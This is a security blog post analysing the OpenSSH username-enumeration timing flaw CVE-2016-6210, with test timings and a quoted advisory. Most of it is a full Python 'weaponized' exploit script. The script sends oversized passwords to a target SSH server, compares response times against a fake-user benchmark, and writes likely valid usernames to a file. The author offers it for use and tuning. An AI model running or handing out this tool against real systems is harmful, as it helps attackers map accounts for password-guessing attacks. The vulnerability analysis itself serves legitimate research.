Analyzing and Weaponizing the Latest OpenSSH Enumeration Vulnerability [CVE-2016-6210]

Reactions have ranged from people expressing distaste for the overall "hype", to a large number of people claiming that either they cannot get it to work or that the vulnerability is simply invalid, to even more people asking whether this is just a rehash of older OpenSSH timing vulnerabilities such as CVE-2006-5229.

Much of the criticism has come from those arguing that passwords of that size shouldn't be accepted by the server in the first place.

I decided to do some analysis myself to verify exploitability, as well as to learn a little about the unavoidable semantics of yet another timing attack.


Posted by Eddie Harari on Full Disclosure

The brief:

By sending large passwords, a remote user can enumerate users on system that runs SSHD. This problem exists in most
modern configuration due to the fact that it takes much longer to calculate SHA256/SHA512 hash than BLOWFISH hash.

The (more) technical:

When SSHD tries to authenticate a non-existing user, it will pick up a fake password structure hardcoded in the SSHD
source code. On this hard coded password structure the password hash is based on BLOWFISH ($2) algorithm.
If real users passwords are hashed using SHA256/SHA512, then sending large passwords (10KB) will result in shorter
response time from the server for non-existing users.
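The asymmetry comes down to hashing cost scaling with password length: sha512-crypt mixes the password into each of its (default 5000) rounds, so a 10KB password costs far more to hash than a short one, while the hard-coded BLOWFISH fake structure doesn't pay that price. The following is just a toy stand-in for that inner loop, not the real crypt(3) implementation, to show the length-dependent cost:

```python
import hashlib
import timeit

def rounds(pw, n=5000):
    # Crude stand-in for sha512-crypt's round loop: the password is mixed
    # into every round, so total hashing cost grows with password length.
    d = b"seed"
    for _ in range(n):
        d = hashlib.sha512(d + pw).digest()
    return d

short = timeit.timeit(lambda: rounds(b"A" * 10), number=3)
long_ = timeit.timeit(lambda: rounds(b"A" * 10000), number=3)
print(long_ > short)  # the 10KB password is measurably slower to hash
```

The attacker never sees the hash; they only observe that the server spends more time per authentication attempt when a real (SHA-hashed) user is targeted with an oversized password.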

NOTE: Mr. Harari tested this on opensshd-7.2p2, while my testing was done on OpenSSH_6.9p1.

Cannibalizing the code shared by Mr. Harari, I wrote up a PoC that would give me the data required to verify this vulnerability's authenticity.

I ran 3 separate tests (a total of 4688 requests), letting it continuously iterate through my list of account names (valid and invalid) and write the results to a CSV for analysis.

Included below are the two main tests and their results.

Excel() -> Sort() -> Graph() -> Light() -> Eyes()

The results were obvious -

Test 1:

Valid Users: realuser & test.
Raw Data -
(I realized too late that the usernames I chose are rather confusing.)

Test 2:

Valid Users: justice, realuser, enumme.
Raw Data

We can plainly see that the existing users take significantly longer than the rest.
  • Non-Existing user average per request: 0.04704169506518s
  • Existing user average per request: 0.21342703801396s
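As a sanity check on those averages, the gap works out to roughly a 4.5x slowdown for existing users:

```python
# Averages taken from the test data above
nonexistent = 0.04704169506518  # avg response per request, non-existing user
existent = 0.21342703801396     # avg response per request, existing user

ratio = existent / nonexistent
print(round(ratio, 2))  # -> 4.54, i.e. valid users respond ~4.5x slower
```

A gap that large is well outside normal network jitter on a LAN, which is why a simple threshold on the deviation from a known-fake benchmark works at all.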

Currently working on developing an effective response-timing threshold for tool-based determination of "valid" usernames, as well as emulating all of this functionality in C.

Below is the first version of the "weaponized" exploit for this. It is currently based around a 10-30% range of deviation for timing(s) of valid versus invalid usernames. Currently only >20% are accepted as valid usernames and appended to the output list accordingly (feel free to tweak this within the script). This has proved effective for me.


import paramiko
import time, sys, csv, os
import threading
import logging

if len(sys.argv) < 4:
    print "REL: CVE-2016-6210"
    print "Usage: " + sys.argv[0] + " uname_list.txt host outfile"
    sys.exit(1)

THREAD_COUNT = 3  # Also the number of "samples" taken per username: (time / THREAD_COUNT) = avg_resp
FAKE_USER = "AaAaAaAaAa"  # Benchmark user, I definitely don't exist
p = "A" * 10000  # The oversized (10KB) password that produces the measurable hashing delay

username_list = sys.argv[1]
time_per_user = 0
threads = []
usertimelist = {}

def ssh_connection(target, usertarget, outfile):
    global time_per_user
    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    starttime = time.clock()
    try:
        ssh.connect(target, username=usertarget, password=p)
    except Exception:
        pass  # Authentication always fails; we only care how long it took
    endtime = time.clock()  # TIME the connection
    total = endtime - starttime
    # print usertarget + " : " + str(total)  # print times of each attempt as it goes (username:time)
    with open(outfile, 'a+') as outputFile:
        csvFile = csv.writer(outputFile, delimiter=',')
        csvFile.writerow([usertarget, total])
    time_per_user += total

if not os.stat(username_list).st_size == 0:
    print "- Connection logging set to paramiko.log, necessary so Paramiko doesn't fuss, useful for debugging."
    paramiko.util.log_to_file("paramiko.log")

    ssh_bench = paramiko.SSHClient()
    ssh_bench.set_missing_host_key_policy(paramiko.AutoAddPolicy())

    print "- Calculating a benchmark using FAKE_USER for more accurate results..."
    tempbench = []
    for i in range(0, THREAD_COUNT):
        starttime = time.clock()
        try:
            ssh_bench.connect(sys.argv[2], username=FAKE_USER, password=p)
        except Exception:
            pass
        endtime = time.clock()
        tempbench.append(endtime - starttime)

    BENCHMARK = sum(tempbench) / THREAD_COUNT
    print "* Benchmark Successfully Calculated: " + str(BENCHMARK)

    with open(username_list) as users:
        for username in users:
            username = username.replace('\n', '')
            for i in range(THREAD_COUNT):
                threader = threading.Thread(target=ssh_connection, args=(sys.argv[2], username, sys.argv[3]))
                threads.append(threader)
            for thread in threads:
                # Start and join one at a time: true concurrency skewed the timings
                thread.start()
                thread.join()
            threads = []
            print "[+] Averaged time for username " + username + " : " + str(time_per_user / THREAD_COUNT)
            usertimelist.update({username: (time_per_user / THREAD_COUNT)})
            time_per_user = 0
else:
    print "[-] List is empty.. what did you expect? Give me some usernames."
    sys.exit(1)

fname = sys.argv[2].replace('.', '_') + "_valid_usernames.txt"
for user in sorted(usertimelist.items(), key=lambda kv: kv[1], reverse=True):
    # Fractional deviation of this user's average from the fake-user benchmark
    deviation = (user[1] - BENCHMARK) / BENCHMARK
    if deviation <= .10:  # 10% or less above the benchmark
        print "[+] " + user[0] + " invalid user; less than 10 percent above benchmark at: " + str(deviation)
    elif deviation < .20:
        print "[+] " + user[0] + " toss up, not including based on current settings at: " + str(deviation)
    elif .20 <= deviation < .30:  # 20% or greater
        print "[+] " + user[0] + " likely a valid user at: " + str(deviation) + ". Appending to: " + fname
        with open(fname, "a+") as outputFile:
            outputFile.write(user[0] + "\n")
    else:  # 30% or greater above the benchmark
        print "[+] " + user[0] + " is a valid user, appending to: " + fname
        with open(fname, "a+") as outputFile:
            outputFile.write(user[0] + "\n")

Coming maybe sometime soon:
  • Get true threads working for efficiency (right now it's rather slow); I had issues with timing skew when true threading was used (I also tried subprocesses). If someone gets this working, feel free to let me know and I will gladly update this.
  • Re-release in C. Added to the GitHub repository; all credit for the C rendition goes to my friend and wonderful artist Anthony Garcia.